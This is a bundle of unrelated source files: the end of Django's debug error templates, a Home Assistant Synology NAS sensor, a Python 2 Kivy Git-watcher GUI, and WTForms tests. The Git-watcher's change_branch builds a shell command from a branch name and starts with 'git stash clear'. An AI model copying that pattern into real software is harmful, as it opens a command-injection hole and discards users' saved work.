<p>No cookie data</p>
{% endif %}
<h3 id="meta-info">META</h3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.META.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>Request data not supplied</p>
{% endif %}
<h3 id="settings-info">Settings</h3>
<h4>Using settings module <code>{{ settings.SETTINGS_MODULE }}</code></h4>
<table class="req">
<thead>
<tr>
<th>Setting</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in settings.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
</div>
{% if not is_email %}
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in your
Django settings file. Change that to <code>False</code>, and Django will
display a standard page generated by the handler for this status code.
</p>
</div>
{% endif %}
</body>
</html>
""")
TECHNICAL_500_TEXT_TEMPLATE = """{% firstof exception_type 'Report' %}{% if request %} at {{ request.path_info }}{% endif %}
{% firstof exception_value 'No exception message supplied' %}
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri }}{% endif %}
Django Version: {{ django_version_info }}
Python Executable: {{ sys_executable }}
Python Version: {{ sys_version_info }}
Python Path: {{ sys_path }}
Server time: {{server_time|date:"r"}}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template loader postmortem
{% if postmortem %}Django tried loading these templates, in this order:
{% for entry in postmortem %}
Using engine {{ entry.backend.name }}:
{% if entry.tried %}{% for attempt in entry.tried %} * {{ attempt.0.loader_name }}: {{ attempt.0.name }} ({{ attempt.1 }})
{% endfor %}{% else %} This engine did not provide a list of tried templates.
{% endif %}{% endfor %}
{% else %}No templates were found because your 'TEMPLATES' setting is not configured.
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}{% for source_line in template_info.source_lines %}
{% ifequal source_line.0 template_info.line %}
{{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}
{% else %}
{{ source_line.0 }} : {{ source_line.1 }}
{% endifequal %}{% endfor %}{% endif %}{% if frames %}
Traceback:
{% for frame in frames %}
{% ifchanged frame.exc_cause %}
{% if frame.exc_cause %}
{% if frame.exc_cause_explicit %}
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:
{% else %}
During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:
{% endif %}
{% endif %}
{% endifchanged %}
File "{{ frame.filename }}" in {{ frame.function }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line }}{% endif %}
{% endfor %}
{% if exception_type %}Exception Type: {{ exception_type }}{% if request %} at {{ request.path_info }}{% endif %}
{% if exception_value %}Exception Value: {{ exception_value }}{% endif %}{% endif %}{% endif %}
{% if request %}Request information:
GET:{% for k, v in request.GET.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No GET data{% endfor %}
POST:{% for k, v in filtered_POST.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No POST data{% endfor %}
FILES:{% for k, v in request.FILES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No FILES data{% endfor %}
COOKIES:{% for k, v in request.COOKIES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No cookie data{% endfor %}
META:{% for k, v in request.META.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
{% else %}Request data not supplied
{% endif %}
Settings:
Using settings module {{ settings.SETTINGS_MODULE }}{% for k, v in settings.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
You're seeing this error because you have DEBUG = True in your
Django settings file. Change that to False, and Django will
display a standard page generated by the handler for this status code.
"""
TECHNICAL_404_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at {{ request.path_info|escape }}</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
{% if raising_view_name %}
<tr>
<th>Raised by:</th>
<td>{{ raising_view_name }}</td>
</tr>
{% endif %}
</table>
</div>
<div id="info">
{% if urlpatterns %}
<p>
Using the URLconf defined in <code>{{ urlconf }}</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
{% for pattern in urlpatterns %}
<li>
{% for pat in pattern %}
{{ pat.regex.pattern }}
{% if forloop.last and pat.name %}[name='{{ pat.name }}']{% endif %}
{% endfor %}
</li>
{% endfor %}
</ol>
<p>The current URL, <code>{{ request_path|escape }}</code>, didn't match any of these.</p>
{% else %}
<p>{{ reason }}</p>
{% endif %}
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
"""
DEFAULT_URLCONF_TEMPLATE = """
<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE"><title>{{ title }}</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th {
padding:1px 6px 1px 3px; background:#fefefe; text-align:left;
font-weight:normal; font-size:11px; border:1px solid #ddd;
}
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#summary { background: #e0ebff; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#instructions { background:#f6f6f6; }
#summary table { border:none; background:transparent; }
</style>
</head>
<body>
<div id="summary">
<h1>{{ heading }}</h1>
<h2>{{ subheading }}</h2>
</div>
<div id="instructions">
<p>
{{ instructions|safe }}
</p>
</div>
<div id="explanation">
<p>
{{ explanation|safe }}
</p>
</div>
</body></html>
"""
|
|
"""
Support for Synology NAS Sensors.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.synologydsm/
"""
import logging
from datetime import timedelta
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.helpers.entity import Entity
from homeassistant.const import (
CONF_HOST, CONF_USERNAME, CONF_PASSWORD, CONF_PORT,
CONF_MONITORED_CONDITIONS, TEMP_CELSIUS, EVENT_HOMEASSISTANT_START)
from homeassistant.util import Throttle
import homeassistant.helpers.config_validation as cv
import voluptuous as vol
REQUIREMENTS = ['python-synology==0.1.0']
_LOGGER = logging.getLogger(__name__)
CONF_DISKS = 'disks'
CONF_VOLUMES = 'volumes'
DEFAULT_NAME = 'Synology DSM'
DEFAULT_PORT = 5000
MIN_TIME_BETWEEN_UPDATES = timedelta(minutes=15)
_UTILISATION_MON_COND = {
'cpu_other_load': ['CPU Load (Other)', '%', 'mdi:chip'],
'cpu_user_load': ['CPU Load (User)', '%', 'mdi:chip'],
'cpu_system_load': ['CPU Load (System)', '%', 'mdi:chip'],
'cpu_total_load': ['CPU Load (Total)', '%', 'mdi:chip'],
'cpu_1min_load': ['CPU Load (1 min)', '%', 'mdi:chip'],
'cpu_5min_load': ['CPU Load (5 min)', '%', 'mdi:chip'],
'cpu_15min_load': ['CPU Load (15 min)', '%', 'mdi:chip'],
'memory_real_usage': ['Memory Usage (Real)', '%', 'mdi:memory'],
'memory_size': ['Memory Size', 'Mb', 'mdi:memory'],
'memory_cached': ['Memory Cached', 'Mb', 'mdi:memory'],
'memory_available_swap': ['Memory Available (Swap)', 'Mb', 'mdi:memory'],
'memory_available_real': ['Memory Available (Real)', 'Mb', 'mdi:memory'],
'memory_total_swap': ['Memory Total (Swap)', 'Mb', 'mdi:memory'],
'memory_total_real': ['Memory Total (Real)', 'Mb', 'mdi:memory'],
'network_up': ['Network Up', 'Kbps', 'mdi:upload'],
'network_down': ['Network Down', 'Kbps', 'mdi:download'],
}
_STORAGE_VOL_MON_COND = {
'volume_status': ['Status', None, 'mdi:checkbox-marked-circle-outline'],
'volume_device_type': ['Type', None, 'mdi:harddisk'],
'volume_size_total': ['Total Size', None, 'mdi:chart-pie'],
'volume_size_used': ['Used Space', None, 'mdi:chart-pie'],
'volume_percentage_used': ['Volume Used', '%', 'mdi:chart-pie'],
'volume_disk_temp_avg': ['Average Disk Temp', None, 'mdi:thermometer'],
'volume_disk_temp_max': ['Maximum Disk Temp', None, 'mdi:thermometer'],
}
_STORAGE_DSK_MON_COND = {
'disk_name': ['Name', None, 'mdi:harddisk'],
'disk_device': ['Device', None, 'mdi:dots-horizontal'],
'disk_smart_status': ['Status (Smart)', None,
'mdi:checkbox-marked-circle-outline'],
'disk_status': ['Status', None, 'mdi:checkbox-marked-circle-outline'],
'disk_exceed_bad_sector_thr': ['Exceeded Max Bad Sectors', None,
'mdi:test-tube'],
'disk_below_remain_life_thr': ['Below Min Remaining Life', None,
'mdi:test-tube'],
'disk_temp': ['Temperature', None, 'mdi:thermometer'],
}
_MONITORED_CONDITIONS = list(_UTILISATION_MON_COND.keys()) + \
list(_STORAGE_VOL_MON_COND.keys()) + \
list(_STORAGE_DSK_MON_COND.keys())
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_MONITORED_CONDITIONS):
vol.All(cv.ensure_list, [vol.In(_MONITORED_CONDITIONS)]),
vol.Optional(CONF_DISKS, default=None): cv.ensure_list,
vol.Optional(CONF_VOLUMES, default=None): cv.ensure_list,
})
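# Illustrative configuration.yaml entry accepted by the schema above (host,
# credentials and the chosen monitored_conditions are placeholders):
#
#   sensor:
#     - platform: synologydsm
#       host: 192.168.1.2
#       username: !secret synology_user
#       password: !secret synology_password
#       monitored_conditions:
#         - cpu_total_load
#         - memory_real_usage
#         - volume_percentage_used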
def setup_platform(hass, config, add_devices_callback, discovery_info=None):
"""Setup the Synology NAS Sensor."""
# pylint: disable=too-many-locals
def run_setup(event):
"""Wait until HASS is fully initialized before creating.
Delay the setup until Home Assistant is fully initialized.
This allows any entities to be created already
"""
# Setup API
api = SynoApi(config.get(CONF_HOST), config.get(CONF_PORT),
config.get(CONF_USERNAME), config.get(CONF_PASSWORD),
hass.config.units.temperature_unit)
sensors = [SynoNasUtilSensor(api, variable,
_UTILISATION_MON_COND[variable])
for variable in config[CONF_MONITORED_CONDITIONS]
if variable in _UTILISATION_MON_COND]
# Handle all Volumes
volumes = config['volumes']
if volumes is None:
volumes = api.storage().volumes
for volume in volumes:
sensors += [SynoNasStorageSensor(api, variable,
_STORAGE_VOL_MON_COND[variable],
volume)
for variable in config[CONF_MONITORED_CONDITIONS]
if variable in _STORAGE_VOL_MON_COND]
# Handle all Disks
disks = config['disks']
if disks is None:
disks = api.storage().disks
for disk in disks:
sensors += [SynoNasStorageSensor(api, variable,
_STORAGE_DSK_MON_COND[variable],
disk)
for variable in config[CONF_MONITORED_CONDITIONS]
if variable in _STORAGE_DSK_MON_COND]
add_devices_callback(sensors)
# Wait until start event is sent to load this component.
hass.bus.listen_once(EVENT_HOMEASSISTANT_START, run_setup)
class SynoApi():
"""Class to interface with API."""
# pylint: disable=too-many-arguments, bare-except
def __init__(self, host, port, username, password, temp_unit):
"""Constructor of the API wrapper class."""
from SynologyDSM import SynologyDSM
self.temp_unit = temp_unit
# Default to None so the checks below still work if construction fails.
self._api = None
try:
self._api = SynologyDSM(host,
port,
username,
password)
except:
_LOGGER.error("Error setting up Synology DSM")
def utilisation(self):
"""Return utilisation information from API."""
if self._api is not None:
return self._api.utilisation
def storage(self):
"""Return storage information from API."""
if self._api is not None:
return self._api.storage
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
"""Update function for updating api information."""
self._api.update()
class SynoNasSensor(Entity):
"""Representation of a Synology Nas Sensor."""
def __init__(self, api, variable, variableInfo, monitor_device=None):
"""Initialize the sensor."""
self.var_id = variable
self.var_name = variableInfo[0]
self.var_units = variableInfo[1]
self.var_icon = variableInfo[2]
self.monitor_device = monitor_device
self._api = api
@property
def name(self):
"""Return the name of the sensor, if any."""
if self.monitor_device is not None:
return "{} ({})".format(self.var_name, self.monitor_device)
else:
return self.var_name
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return self.var_icon
@property
def unit_of_measurement(self):
"""Return the unit the value is expressed in."""
if self.var_id in ['volume_disk_temp_avg', 'volume_disk_temp_max',
'disk_temp']:
return self._api.temp_unit
else:
return self.var_units
def update(self):
"""Get the latest data for the states."""
if self._api is not None:
self._api.update()
class SynoNasUtilSensor(SynoNasSensor):
"""Representation a Synology Utilisation Sensor."""
@property
def state(self):
"""Return the state of the sensor."""
network_sensors = ['network_up', 'network_down']
memory_sensors = ['memory_size', 'memory_cached',
'memory_available_swap', 'memory_available_real',
'memory_total_swap', 'memory_total_real']
if self.var_id in network_sensors or self.var_id in memory_sensors:
attr = getattr(self._api.utilisation(), self.var_id)(False)
if self.var_id in network_sensors:
return round(attr / 1024.0, 1)
elif self.var_id in memory_sensors:
return round(attr / 1024.0 / 1024.0, 1)
else:
return getattr(self._api.utilisation(), self.var_id)
class SynoNasStorageSensor(SynoNasSensor):
"""Representation a Synology Utilisation Sensor."""
@property
def state(self):
"""Return the state of the sensor."""
temp_sensors = ['volume_disk_temp_avg', 'volume_disk_temp_max',
'disk_temp']
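# The API appears to report temperatures in Celsius; when the configured
# unit is not Celsius, the branch below converts with F = C * 1.8 + 32
# (e.g. 40 C -> 40 * 1.8 + 32 = 104.0 F).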
if self.monitor_device is not None:
if self.var_id in temp_sensors:
attr = getattr(self._api.storage(),
self.var_id)(self.monitor_device)
if self._api.temp_unit == TEMP_CELSIUS:
return attr
else:
return round(attr * 1.8 + 32.0, 1)
else:
return getattr(self._api.storage(),
self.var_id)(self.monitor_device)
|
|
import os
import json
import settings
import sys
from watchdog.observers import Observer
from watchdog.observers.api import ObservedWatch
from kivy.app import App
from kivy.core.window import Window
from kivy.lang import Builder, Parser, ParserException
from kivy.properties import ListProperty, StringProperty, \
ObjectProperty
from kivy.factory import Factory
from kivy.uix.gridlayout import GridLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.screenmanager import SlideTransition
from kivy.clock import Clock
from kivy.uix.progressbar import ProgressBar
from kivy.uix.spinner import Spinner
from kivy.uix.scatter import Scatter
from kivy.uix.widget import WidgetException
from kivy.uix.screenmanager import ScreenManagerException
from shortcuts import run_syscall, striptags, findparent
from checker import ChangeHandler
from buttons import *
from boxlayouts import *
Clock.max_iteration = 20
KVS = os.path.join(settings.PROJECT_PATH, "assets%sthemes" %
settings.PATH_SEPERATOR)
CLASSES = [c[:-3] for c in os.listdir(KVS) if c.endswith('.kv')]
ICON_PATH = os.path.join(settings.PROJECT_PATH, 'assets/GitWatcher.ico')
class MyScatter(Scatter):
name = StringProperty("")
sha = StringProperty("")
text = StringProperty("")
date = StringProperty("")
class CustomLabel(Label):
def __del__(self, *args, **kwargs):
pass
class ConfirmPopup(GridLayout):
"""
ConfirmPopup handles a yes/no confirmation from the user.
"""
text = StringProperty()
def __del__(self, *args, **kwargs):
pass
def __init__(self, **kwargs):
self.register_event_type('on_answer')
super(ConfirmPopup, self).__init__(**kwargs)
def on_answer(self, *args):
pass
class RemotePopup(GridLayout):
"""
RemotePopup lists all remote names and addresses for the user.
"""
remotes = ListProperty([])
branch = StringProperty("")
def __init__(self, **kwargs):
self.register_event_type('on_push')
super(RemotePopup, self).__init__(**kwargs)
def args_converter(self, row_index, item):
return {
'remote_path': item['path'],
'remote_name': item['name']
}
def on_push(self, *args):
pass
class CustomSpinner(Spinner):
"""
The base Spinner's _on_dropdown_select method only changes the
widget's text attribute, which is not enough here. CustomSpinner
displays the local branch list, so selecting an entry must also
switch the current branch.
"""
def __del__(self, *args, **kwargs):
pass
def _on_dropdown_select(self, instance, data, *largs):
self.text = "[b]%s[/b]" % data
self.is_open = False
root = findparent(self, RepoWatcher)
root.change_branch(data, self.path)
class Menu(BoxLayout):
"""
Each .kv theme file corresponds to a widget class, so each one has
to be converted. Every .kv file maps to a menu button; the common
base class is named 'Menu'.
"""
def __del__(self, *args, **kwargs):
pass
def __init__(self, **kwargs):
super(Menu, self).__init__(**kwargs)
parser = Parser(content=open(self.kv_file).read())
widget = Factory.get(parser.root.name)()
Builder._apply_rule(widget, parser.root, parser.root)
self.add_widget(widget)
@property
def kv_file(self):
return os.path.join(KVS, self.__class__.__name__ + '.kv')
for class_name in CLASSES:
globals()[class_name] = type(class_name, (Menu,), {})
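# For example, a theme file named History.kv under assets/themes (name is
# illustrative) yields a dynamically created History(Menu) class whose
# kv_file property points back at that file, so every .kv theme becomes a
# loadable widget class without being declared by hand.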
class RepoWatcher(BoxLayout):
"""
RepoWatcher is the main class; all other widgets are generated under it.
::repos: repository list holding the required fields of every
repository (names, paths)
::active_menu_button: the active menu button (history, changes,
settings or branches) determines which screen is shown
::screen_manager: keeping screen management in an attribute is more
efficient and avoids missed transitions
::pb: progress bar so progression can be displayed
methods: show_kv, load_repo, get_activebranch, get_branches, change_branch
"""
repos = ListProperty()
screen_manager = ObjectProperty()
# Change control handler necessity
observer = ObjectProperty(None)
pb = ProgressBar()
def __del__(self, *args, **kwargs):
pass
def __init__(self, *args, **kwargs):
# Related kv will be return
super(BoxLayout, self).__init__(*args, **kwargs)
if 'initialize' in kwargs:
screen_button = {
'Changes': self.changes_button,
'History': self.history_button,
'Branches': self.branches_button,
'Settings': self.settings_button
}
# previously selected repo should be found.
try:
reponame = settings.DB.store_get('current_repo').strip()
repos = settings.DB.store_get('repos')
repo = filter(
lambda x: x['name'].strip() == reponame, repos)[0]
repo_path = repo['path']
except:
repo_path = ""
# Previously selected button and related screen is taken
screen = settings.DB.store_get('screen')
if screen == "FileDiff":
screen = "History"
screen_button[screen].make_pressed()
# Based on the screen base model will be taken
related_box = getattr(
self.screen_manager, screen.lower()).children[0].children[0]
# Then related box'es processes will be called.
# To know that the screen was loaded before all
# related processes is called.
function_name = ""
for func in ['changes_check', 'branches_check',
'check_history', 'settings_check']:
if hasattr(related_box, func):
function_name = func
break
if function_name == 'changes_check':
tasks = [self.show_kv(screen),
self.activate_sync(repo_path),
self.get_branches(repo_path),
related_box.get_userinfo(repo_path),
related_box.get_difffiles(repo_path),
related_box.get_unpushedcommits(repo_path),
related_box.get_current_branch(repo_path)]
elif function_name == 'branches_check':
tasks = [self.show_kv(screen),
self.activate_sync(repo_path),
self.get_branches(repo_path),
related_box.set_repopath(repo_path),
related_box.handle_merge_view(repo_path),
related_box.remove_newbranch_widget(repo_path),
related_box.remove_rename_widget(repo_path),
related_box.get_branches(repo_path),
related_box.clear_buttonactions(repo_path)]
elif function_name == 'check_history':
tasks = [self.show_kv(screen),
self.activate_sync(repo_path),
self.get_branches(repo_path),
related_box.get_history(repo_path),
related_box.get_diff_clear(repo_path)]
elif function_name == 'settings_check':
tasks = [self.show_kv(screen),
self.activate_sync(repo_path),
self.get_branches(repo_path),
related_box.set_repopath(repo_path),
related_box.get_remote(repo_path),
related_box.get_gitignore(repo_path)]
# Processes will be called and displayed completed ones on
# animation.
ProgressAnimator(self.pb, tasks)
os.chdir(settings.PROJECT_PATH)
self.observer_restart(repo_path, self)
def show_kv(self, value):
"""
show_kv handles the screen_manager changes. The default screen, set
on init, is 'Changes'; the possible values are declared in the main
.kv file, and the corresponding screen (.kv file) is displayed.
::value: one of 'Changes', 'History', 'Branches', 'Settings',
'FileDiff'
At runtime the selected menu button is checked by class name, so the
screen data is either refreshed or kept as is.
"""
from boxlayouts import ChangesBox, BranchesBox, SettingsBox, HistoryBox
settings.DB.store_put('screen', value)
settings.DB.store_sync()
def _wrapper(callback=None):
try:
# Transition handled
if value == "FileDiff":
self.screen_manager.transition = SlideTransition(
direction='right')
else:
self.screen_manager.transition = SlideTransition(
direction='left')
# screen changes
prev = self.screen_manager.current
self.screen_manager.current = value
child = self.screen_manager.current_screen.children[0]
# Menu selection control and related repository tried to find
selected_menu_class = child.children[0].__class__
repolist = self.repolstview.children[0].children[0].children
pressed_repo = filter(lambda x: x.repobut.pressed, repolist)
repo_path = pressed_repo[0].repo_path if pressed_repo else ""
# Related screen and repository data merged and screen datas
# update.
if repo_path:
if selected_menu_class == ChangesBox().__class__:
child.children[0].changes_check(repo_path)
elif selected_menu_class == HistoryBox().__class__:
keep_old = False
if prev == 'FileDiff':
keep_old = True
child.children[0].check_history(repo_path,
keep_old=keep_old)
elif selected_menu_class == BranchesBox().__class__:
child.children[0].branches_check(repo_path)
elif selected_menu_class == SettingsBox().__class__:
child.children[0].settings_check(repo_path)
else:
if selected_menu_class == BranchesBox().__class__:
child.children[0].remove_newbranch_widget("")
child.children[0].remove_rename_widget("")
child.children[0].handle_merge_view("")
except (WidgetException, ScreenManagerException):
pass
if callback:
callback()
return _wrapper
def activate_sync(self, path):
def _wrapper(callback=None):
if path:
self.syncbutton.text = self.syncbutton.text.\
replace(settings.HEX_COLOR1, '000000')
self.syncbutton.path = path
if callback:
callback()
return _wrapper
def reset_screen(self):
"""
reset_screen clears the screens when a repository has been
removed from the list.
"""
child = self.screen_manager.current_screen.children[0]
selected_menu_class = child.children[0].__class__
if selected_menu_class == ChangesBox().__class__:
child.children[0].changes_check("")
elif selected_menu_class == HistoryBox().__class__:
child.children[0].check_history("", keep_old=False)
elif selected_menu_class == BranchesBox().__class__:
child.children[0].branches_check("")
elif selected_menu_class == SettingsBox().__class__:
child.children[0].settings_check("")
def theme_args_converter(self, row_index, item):
"""
theme_args_converter converts colour scheme names only.
"""
return {
'name': item
}
def args_converter(self, row_index, item):
"""
args_converter prepares repositories for display.
Kivy's Factory method requires list data in this converted form.
"""
return {
'repo_path': item['path'],
'repo_name': item['name'],
'init_pressed': item['init_pressed']}
def load_repo(self, reset=True):
"""
load_repo loads the repository list from the .json file (if it exists).
The file path comes from settings; on any exception repos is set to an empty list.
"""
try:
self.repos = settings.DB.store_get('repos')
settings.DB.store_sync()
try:
reponame = settings.DB.store_get('current_repo').strip()
repo = filter(
lambda x: x['name'].strip() == reponame, self.repos)
repo = repo and repo[0] or ""
for rep in self.repos:
rep['init_pressed'] = True if rep == repo else False
except Exception, e:
print "BARBAROS", e
pass
except (TypeError, ValueError, KeyError):
directory = os.path.dirname(settings.REPOFILE)
if not os.path.exists(directory):
os.makedirs(directory)
settings.DB.store_put('repos', [])
settings.DB.store_put('current_repo', "")
settings.DB.store_sync()
self.repos = []
if reset:
self.reset_screen()
def remove_repo(self, path):
try:
repos = settings.DB.store_get('repos')
self.repos = filter(lambda x: x['path'] != path, repos)
settings.DB.store_put('repos', self.repos)
settings.DB.store_sync()
except (TypeError, ValueError):
self.repos = []
finally:
self.reset_screen()
def get_activebranch(self, path):
"""
get_activebranch finds the current branch of the selected git repository.
::path: Repository path
"""
os.chdir(path)
out = run_syscall('git branch')
text = filter(
lambda x: x.find("* ") != -1, out.split("\n"))[0].replace("* ", "")
os.chdir(settings.PROJECT_PATH)
return text
def get_branches(self, path):
"""
get_branches collects the local branches of the repository.
::path: Repository path.
::callback: called at the end; the callback is used to report
progress of the surrounding bulk operation, if any.
"""
def _wrapper(callback=None):
if path:
os.chdir(path)
out = run_syscall('git branch')
values = map(
lambda x: x.replace("* ", "").strip(), out.split("\n"))
text = self.get_activebranch(path)
self.branchlist.text = "[color=%s][b]%s[/b][/color]" % (
settings.HEX_COLOR1, text)
self.branchlist.values = values
self.branchlist.path = path
self.branchlist.font_name = settings.KIVY_DEFAULT_FONT
os.chdir(settings.PROJECT_PATH)
else:
self.branchlist.text = ""
self.branchlist.values = []
self.branchlist.path = ""
self.branchlist.font_name = settings.KIVY_DEFAULT_FONT
if callback:
callback()
return _wrapper
def change_branch(self, branch_name, path):
"""
change_branch handles switching the current branch.
::branch_name: name of the branch to check out
::path: related repository path
The branch name arrives with markup, which must be stripped before use.
"""
try:
branch_name = striptags(branch_name)
os.chdir(path)
out = run_syscall(
'git stash clear;git stash;git checkout %s;git stash pop' % branch_name)
screen = self.screen_manager.children[0].children[0].children[0]
if self.screen_manager.current == "History":
screen.check_history(path)
elif self.screen_manager.current == "Changes":
screen.changes_check(path)
elif self.screen_manager.current == "Branches":
screen.branches_check(path)
elif self.screen_manager.current == 'Settings':
screen.settings_check(path)
except OSError:
pass
finally:
os.chdir(settings.PROJECT_PATH)
def refresh_required(self, path):
repoitems = self.repolstview.children[0].children[0].children
if path:
for item in repoitems:
if item.repobut.repo_path == path:
item.refreshbut.textcolor = settings.HEX_COLOR1
else:
for item in repoitems:
if item.repobut.repo_path == path:
item.refreshbut.textcolor = settings.HEX_COLOR2
def observer_start(self, repo_path, root):
if repo_path:
event_handler = ChangeHandler(path=repo_path, root=root)
self.observer = Observer()
self.observer.schedule(
event_handler, path=repo_path, recursive=True)
self.observer.start()
def observer_stop(self):
if self.observer:
self.observer.stop()
self.observer.join()
def observer_restart(self, repo_path, root):
self.observer_stop()
self.observer_start(repo_path, root)
class RepoWatcherApp(App):
def __init__(self, *args, **kwargs):
super(RepoWatcherApp, self).__init__(*args, **kwargs)
Builder.load_file('%(pp)s%(ps)sassets%(ps)sthemes%(ps)sCompact.kv' %
{'pp': settings.PROJECT_PATH,
'ps': settings.PATH_SEPERATOR})
self.layout = RepoWatcher(initialize=True)
self.icon = ICON_PATH
self.title = "Git Watcher UI"
def __del__(self, *args, **kwargs):
pass
def build(self):
"""
Create the main application object: the title, icon and repository
list are set and the data collections are loaded.
::title: sets the project title
::icon: sets the icon to display
Builder has to pick up the style; on Mac a .kv file with the same
name as the main application in the same folder is enough, but on
Linux-based OSes the developer must load it explicitly with
::Builder.load_file(...)
The main 'RepoWatcher' widget must hold all previously saved
repository data, so 'load_repo' is called.
"""
self.layout.load_repo()
return self.layout
def restart(self):
args = sys.argv[:]
args.insert(0, sys.executable)
os.execv(sys.executable, args)
def on_stop(self):
self.layout.observer_stop()
if __name__ == '__main__':
RepoWatcherApp().run()
|
|
import pytest
from tests.common import DummyPostData
from wtforms.fields import IntegerField
from wtforms.fields import StringField
from wtforms.form import BaseForm
from wtforms.form import Form
from wtforms.meta import DefaultMeta
from wtforms.validators import DataRequired
from wtforms.validators import ValidationError
class TestBaseForm:
def get_form(self, **kwargs):
def validate_test(form, field):
if field.data != "foobar":
raise ValidationError("error")
return BaseForm({"test": StringField(validators=[validate_test])}, **kwargs)
def test_data_proxy(self):
form = self.get_form()
form.process(test="foo")
assert form.data == {"test": "foo"}
def test_errors_proxy(self):
form = self.get_form()
form.process(test="foobar")
form.validate()
assert form.errors == {}
form = self.get_form()
form.process()
form.validate()
assert form.errors == {"test": ["error"]}
def test_contains(self):
form = self.get_form()
assert "test" in form
assert "abcd" not in form
def test_field_removal(self):
form = self.get_form()
del form["test"]
with pytest.raises(AttributeError):
form.test
assert "test" not in form
def test_field_adding(self):
form = self.get_form()
assert len(list(form)) == 1
form["foo"] = StringField()
assert len(list(form)) == 2
form.process(DummyPostData(foo=["hello"]))
assert form["foo"].data == "hello"
form["test"] = IntegerField()
assert isinstance(form["test"], IntegerField)
assert len(list(form)) == 2
with pytest.raises(AttributeError):
form["test"].data
form.process(DummyPostData(test=["1"]))
assert form["test"].data == 1
assert form["foo"].data is None
def test_populate_obj(self):
m = type("Model", (object,), {})
form = self.get_form()
form.process(test="foobar")
form.populate_obj(m)
assert m.test == "foobar"
assert [k for k in dir(m) if not k.startswith("_")] == ["test"]
def test_prefixes(self):
form = self.get_form(prefix="foo")
assert form["test"].name == "foo-test"
assert form["test"].short_name == "test"
assert form["test"].id == "foo-test"
form = self.get_form(prefix="foo.")
form.process(DummyPostData({"foo.test": ["hello"], "test": ["bye"]}))
assert form["test"].data == "hello"
assert self.get_form(prefix="foo[")["test"].name == "foo[-test"
def test_formdata_wrapper_error(self):
form = self.get_form()
with pytest.raises(TypeError):
form.process([])
class TestFormMeta:
def test_monkeypatch(self):
class F(Form):
a = StringField()
assert F._unbound_fields is None
F()
assert F._unbound_fields == [("a", F.a)]
F.b = StringField()
assert F._unbound_fields is None
F()
assert F._unbound_fields == [("a", F.a), ("b", F.b)]
del F.a
with pytest.raises(AttributeError):
F.a
F()
assert F._unbound_fields == [("b", F.b)]
F._m = StringField()
assert F._unbound_fields == [("b", F.b)]
